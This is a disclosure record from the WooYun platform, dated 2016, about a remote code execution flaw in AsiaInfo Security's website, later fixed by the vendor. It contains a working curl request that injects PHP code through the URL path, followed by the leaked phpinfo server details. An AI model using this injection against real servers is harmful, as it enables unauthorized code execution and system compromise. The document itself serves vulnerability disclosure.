当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170826

漏洞标题:亚信安全www官方网站任意代码执行漏洞

相关厂商:亚信安全

漏洞作者: 猪猪侠

提交时间:2016-01-18 14:12

修复时间:2016-02-07 21:42

公开时间:2016-02-07 21:42

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-07: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

亚信安全在云安全领域市场占有率全球第一,做云安全的,做APT治理的,做防病毒的,还做威胁情报
亚信安全www官方网站(www.asiainfo-sec.com)任意代码执行漏洞

详细说明:

#1 漏洞地址

curl "http://www.asiainfo-sec.com/index.php/module/action/param1/$%7B@print(phpinfo())%7D"

漏洞证明:

#2 漏洞证明

<table border="0" cellpadding="3" width="600">
<tr><td class="e">System </td><td class="v">Linux localhost.localdomain 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 </td></tr>
<tr><td class="e">Build Date </td><td class="v">Jun 23 2015 21:18:22 </td></tr>
<tr><td class="e">Server API </td><td class="v">Apache 2.0 Handler </td></tr>
<tr><td class="e">Virtual Directory Support </td><td class="v">disabled </td></tr>
<tr><td class="e">Configuration File (php.ini) Path </td><td class="v">/etc </td></tr>
<tr><td class="e">Loaded Configuration File </td><td class="v">/etc/php.ini </td></tr>
<tr><td class="e">Scan this dir for additional .ini files </td><td class="v">/etc/php.d </td></tr>
<tr><td class="e">Additional .ini files parsed </td><td class="v">/etc/php.d/curl.ini,
/etc/php.d/fileinfo.ini,
/etc/php.d/json.ini,
/etc/php.d/mbstring.ini,
/etc/php.d/mysql.ini,
/etc/php.d/mysqli.ini,
/etc/php.d/pdo.ini,
/etc/php.d/pdo_mysql.ini,
/etc/php.d/pdo_sqlite.ini,
/etc/php.d/phar.ini,
/etc/php.d/sqlite3.ini,
/etc/php.d/zip.ini
</td></tr>
<tr><td class="e">PHP API </td><td class="v">20100412 </td></tr>
<tr><td class="e">PHP Extension </td><td class="v">20100525 </td></tr>
<tr><td class="e">Zend Extension </td><td class="v">220100525 </td></tr>
<tr><td class="e">Zend Extension Build </td><td class="v">API220100525,NTS </td></tr>
<tr><td class="e">PHP Extension Build </td><td class="v">API20100525,NTS </td></tr>
<tr><td class="e">Debug Build </td><td class="v">no </td></tr>
<tr><td class="e">Thread Safety </td><td class="v">disabled </td></tr>
<tr><td class="e">Zend Signal Handling </td><td class="v">disabled </td></tr>
<tr><td class="e">Zend Memory Manager </td><td class="v">enabled </td></tr>
<tr><td class="e">Zend Multibyte Support </td><td class="v">provided by mbstring </td></tr>
<tr><td class="e">IPv6 Support </td><td class="v">enabled </td></tr>
<tr><td class="e">DTrace Support </td><td class="v">disabled </td></tr>
<tr><td class="e">Registered PHP Streams</td><td class="v">https, ftps, compress.zlib, compress.bzip2, php, file, glob, data, http, ftp, phar, zip</td></tr>
<tr><td class="e">Registered Stream Socket Transports</td><td class="v">tcp, udp, unix, udg, ssl, sslv3, sslv2, tls</td></tr>
<tr><td class="e">Registered Stream Filters</td><td class="v">zlib.*, bzip2.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dec


<tr><td class="e">_SERVER["SERVER_SOFTWARE"]</td><td class="v">Apache/2.4.6 (CentOS) PHP/5.4.16</td></tr>
<tr><td class="e">_SERVER["SERVER_NAME"]</td><td class="v">www.asiainfo-sec.com</td></tr>
<tr><td class="e">_SERVER["SERVER_ADDR"]</td><td class="v">10.28.141.129</td></tr>
<tr><td class="e">_SERVER["SERVER_PORT"]</td><td class="v">80</td></tr>
<tr><td class="e">_SERVER["REMOTE_ADDR"]</td><td class="v">10.28.141.11</td></tr>
<tr><td class="e">_SERVER["DOCUMENT_ROOT"]</td><td class="v">/var/www/html/asiainfo-sec</td></tr>
<tr><td class="e">_SERVER["REQUEST_SCHEME"]</td><td class="v">http</td></tr>
<tr><td class="e">_SERVER["CONTEXT_PREFIX"]</td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">_SERVER["CONTEXT_DOCUMENT_ROOT"]</td><td class="v">/var/www/html/asiainfo-sec</td></tr>
<tr><td class="e">_SERVER["SERVER_ADMIN"]</td><td class="v">root@localhost</td></tr>
<tr><td class="e">_SERVER["SCRIPT_FILENAME"]</td><td class="v">/var/www/html/asiainfo-sec/index.php</td></tr>
<tr><td class="e">_SERVER["REMOTE_PORT"]</td><td class="v">31156</td></tr>
<tr><td class="e">_SERVER["GATEWAY_INTERFACE"]</td><td class="v">CGI/1.1</td></tr>
<tr><td class="e">_SERVER["SERVER_PROTOCOL"]</td><td class="v">HTTP/1.1</td></tr>
<tr><td class="e">_SERVER["REQUEST_METHOD"]</td><td class="v">GET</td></tr>
<tr><td class="e">_SERVER["QUERY_STRING"]</td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">_SERVER["REQUEST_URI"]</td><td class="v">/index.php/module/action/param1/$%7B@print(phpinfo())%7D</td></tr>
<tr><td class="e">_SERVER["SCRIPT_NAME"]</td><td class="v">/index.php</td></tr>
<tr><td class="e">_SERVER["PATH_INFO"]</td><td class="v">/module/action/param1/${@print(phpinfo())}</td></tr>
<tr><td class="e">_SERVER["PATH_TRANSLATED"]</td><td class="v">/var/www/html/asiainfo-sec/module/action/param1/${@print(phpinfo())}</td></tr>
<tr><td class="e">_SERVER["PHP_SELF"]</td><td class="v">/index.php/module/action/param1/${@print(phpinfo())}</td></tr>
<tr><td class="e">_SERVER["REQUEST_TIME_FLOAT"]</td><td class="v">1453096960.528</td></tr>
<tr><td class="e">_SERVER["REQUEST_TIME"]</td><td class="v">1453096960</td></tr>
</table><br />

修复方案:

更新框架

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-20 14:23

厂商回复:

非常感谢及时告知我们系统的潜在风险,我们将尽快解决更正。

最新状态:

2016-01-20:已修复

2016-02-07:确认修复漏洞并公开